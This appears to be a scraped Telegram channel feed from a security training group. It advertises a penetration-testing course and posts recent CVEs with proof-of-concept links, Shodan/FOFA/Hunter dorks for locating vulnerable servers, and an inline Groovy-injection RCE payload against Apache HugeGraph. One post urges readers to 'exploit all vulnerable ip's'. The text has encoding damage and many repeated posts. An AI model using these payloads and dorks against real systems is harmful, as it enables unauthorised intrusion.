π Advance Your Career in Cybersecurity with Our Comprehensive VAPT Course! π
π¨Are you ready to become a cybersecurity expert? Enroll in our Vulnerability Assessment and Penetration Testing (VAPT) course and gain the skills you need to protect critical systems and data.
π’Key Features:
πΈLive Trainer-Led Online Training: Engage in interactive sessions led by experienced cybersecurity professionals.
πΈ50 Hours of Classes Over 3 Months: Comprehensive coverage of VAPT topics, allowing for in-depth learning and mastery.
πΈ70% Practical Oriented: Emphasis on hands-on labs and real-world scenarios to ensure you can apply what you learn.
πΈPay in 2 Installments: Flexible payment options to suit your financial needs.
πΈCareer Oriented Training: Focused on building the skills needed for a successful career in cybersecurity.
πΈ2 Practical Assignments & 1 Capture The Flag (CTF) Exam: Practical assessments to test and enhance your skills.
π Register Now: https://wa.me/message/NQLPOBIAEFDBN1
π¨Are you ready to become a cybersecurity expert? Enroll in our Vulnerability Assessment and Penetration Testing (VAPT) course and gain the skills you need to protect critical systems and data.
π’Key Features:
πΈLive Trainer-Led Online Training: Engage in interactive sessions led by experienced cybersecurity professionals.
πΈ50 Hours of Classes Over 3 Months: Comprehensive coverage of VAPT topics, allowing for in-depth learning and mastery.
πΈ70% Practical Oriented: Emphasis on hands-on labs and real-world scenarios to ensure you can apply what you learn.
πΈPay in 2 Installments: Flexible payment options to suit your financial needs.
πΈCareer Oriented Training: Focused on building the skills needed for a successful career in cybersecurity.
πΈ2 Practical Assignments & 1 Capture The Flag (CTF) Exam: Practical assessments to test and enhance your skills.
π Register Now: https://wa.me/message/NQLPOBIAEFDBN1
Exploit all vulnerable ip's: CVE-2024-24919
https://github.com/seed1337/CVE-2024-24919-POC
https://github.com/seed1337/CVE-2024-24919-POC
GitHub
GitHub - seed1337/CVE-2024-24919-POC
Contribute to seed1337/CVE-2024-24919-POC development by creating an account on GitHub.
π2
Media is too big
VIEW IN TELEGRAM
π¨Go Dork β The Fastest Dork Scannerπ¨
πSearching for relevant things on the Internet is always challenging work. Sometimes we donβt get desired results for our query or question. So to solve this problem, there is a concept of Dorking.
πGithub: https://github.com/dwisiswant0/go-dork
πSearching for relevant things on the Internet is always challenging work. Sometimes we donβt get desired results for our query or question. So to solve this problem, there is a concept of Dorking.
πGithub: https://github.com/dwisiswant0/go-dork
π3π€1
Media is too big
VIEW IN TELEGRAM
π¨Check Point Quantum Gateway - CVE-2024-24919π¨
πCVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade.
πGithub POC: https://github.com/seed1337/CVE-2024-24919-POC
πCVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade.
πGithub POC: https://github.com/seed1337/CVE-2024-24919-POC
π2π€―1
Media is too big
VIEW IN TELEGRAM
π¨Adobe Coldfusion XSS - CVE-2023-44352π¨
πAdobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
.
.
.
πpoc: https://buff.ly/3V2F8tD
πAdobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
.
.
.
πpoc: https://buff.ly/3V2F8tD
π2π€―2
Brut Security
π¨Check Point Quantum Gateway - CVE-2024-24919π¨ πCVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPNβ¦
"Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7"
π¨CVE-2024-4956:Nexus Repository Flaw Exposedπ¨
β οΈThis vulnerability, discovered and responsibly reported by @erickfernandox, could allow attackers to access and download sensitive system files without authentication.
πDorks:
Hunter:/product.name="Nexus Repository"
FOFA:app="Nexus-Repository-Manager"
SHODAN:http.html:"Nexus Repository"
POC: https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2024-4956
β οΈThis vulnerability, discovered and responsibly reported by @erickfernandox, could allow attackers to access and download sensitive system files without authentication.
πDorks:
Hunter:/product.name="Nexus Repository"
FOFA:app="Nexus-Repository-Manager"
SHODAN:http.html:"Nexus Repository"
POC: https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2024-4956
GitHub
vulhub/nexus/CVE-2024-4956 at master Β· vulhub/vulhub
Pre-Built Vulnerable Environments Based on Docker-Compose - vulhub/vulhub
CVE-2024-27348: Unauthenticated users can execute OS commands via Groovy injection in Apache HugeGraph-Server. Upgrade to version 1.3.0 to mitigate.
π₯POC: https://lnkd.in/g_v4h7Cg
πDorks:
Hunter: /product.name="Apache HugeGraph"
FOFA: app="HugeGraph-Studio"
SHODAN: http.title:"HugeGraph"
π₯POC: https://lnkd.in/g_v4h7Cg
πDorks:
Hunter: /product.name="Apache HugeGraph"
FOFA: app="HugeGraph-Studio"
SHODAN: http.title:"HugeGraph"
π€―8
This media is not supported in your browser
VIEW IN TELEGRAM
π’Use This Extensions, it will help you to Extract all domains From any website.
πΈLink Extractor: https://link-extractor.cssnr.com
πΈLink Gopher: https://github.com/az0/linkgopher
πΈLink Extractor: https://link-extractor.cssnr.com
πΈLink Gopher: https://github.com/az0/linkgopher
π2π€―2
π¨CVE-2024-27348: RCE in Apache HugeGraph-Server.
π’Remedy: Upgrade to version 1.3.0 to mitigate.
πPayload:
πVideo: https://youtu.be/32cyeCd4DEc
π’Remedy: Upgrade to version 1.3.0 to mitigate.
πPayload:
{"gremlin":"def result = \"uname -a\".execute().text\njava.lang.reflect.Field field = Thread.currentThread().getClass().getDeclaredField(\"BrutSecurity\"+ result);"
}
πVideo: https://youtu.be/32cyeCd4DEc
YouTube
CVE-2024-27348 | RCE in Apache HugeGraph-Server | Bug Bounty POC | Brut Security
π¨CVE-2024-27348: RCE in Apache HugeGraph-Server.This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.3.0 in Java8 & Java11 Users are recommended to upgrade to version 1.3.0 with Java11 & enable the Auth system, which fixes the issue.
π’Remedy:β¦
π’Remedy:β¦
π1
π¨Progress Telerik Report Server pre-authenticated RCE chain (CVE-2024-4358/CVE-2024-1800)π¨
π’PoC: https://github.com/sinsinology/CVE-2024-4358
β Detailed Analysis from @SinSinology https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/
πDorks:
πΈHunter: /product.name="Telerik report server"
πΈFOFA: app="Telerik-Report-Server"
πΈSHODAN: http.title:"Telerik report server"
π’PoC: https://github.com/sinsinology/CVE-2024-4358
β Detailed Analysis from @SinSinology https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/
πDorks:
πΈHunter: /product.name="Telerik report server"
πΈFOFA: app="Telerik-Report-Server"
πΈSHODAN: http.title:"Telerik report server"
π2
Hello Members, Hope you're doing well. We have created a WhatsApp Channel for Brut Security. Join now, more cyber security insights coming soon!
You can join here:https://whatsapp.com/channel/0029VacUEmpCnA8014ZLnm1L
You can join here:https://whatsapp.com/channel/0029VacUEmpCnA8014ZLnm1L
WhatsApp.com
Brut Security | WhatsApp Channel
Brut Security WhatsApp Channel. We offer Cyber Security Training, Penetration Testing Services and Bug Bounty Tips to protect businesses and individuals from cyber attacks. Feel Free to DMπ‘οΈ. 59 followers
Media is too big
VIEW IN TELEGRAM
π¨Android SSL Pinning Bypass using Noxerπ¨
πAutomate your Android penetration testing lab setup using Nox Emulator. Noxer is a powerful Python script designed for automating Android penetration testing tasks within the Nox Player emulator. It simplifies setup, enhances stability, manages Frida Server, removes unwanted bloatware, integrates BurpSuite certificates, and much more!
πNoxer: https://buff.ly/4b0gxM4
πAutomate your Android penetration testing lab setup using Nox Emulator. Noxer is a powerful Python script designed for automating Android penetration testing tasks within the Nox Player emulator. It simplifies setup, enhances stability, manages Frida Server, removes unwanted bloatware, integrates BurpSuite certificates, and much more!
πNoxer: https://buff.ly/4b0gxM4
π₯4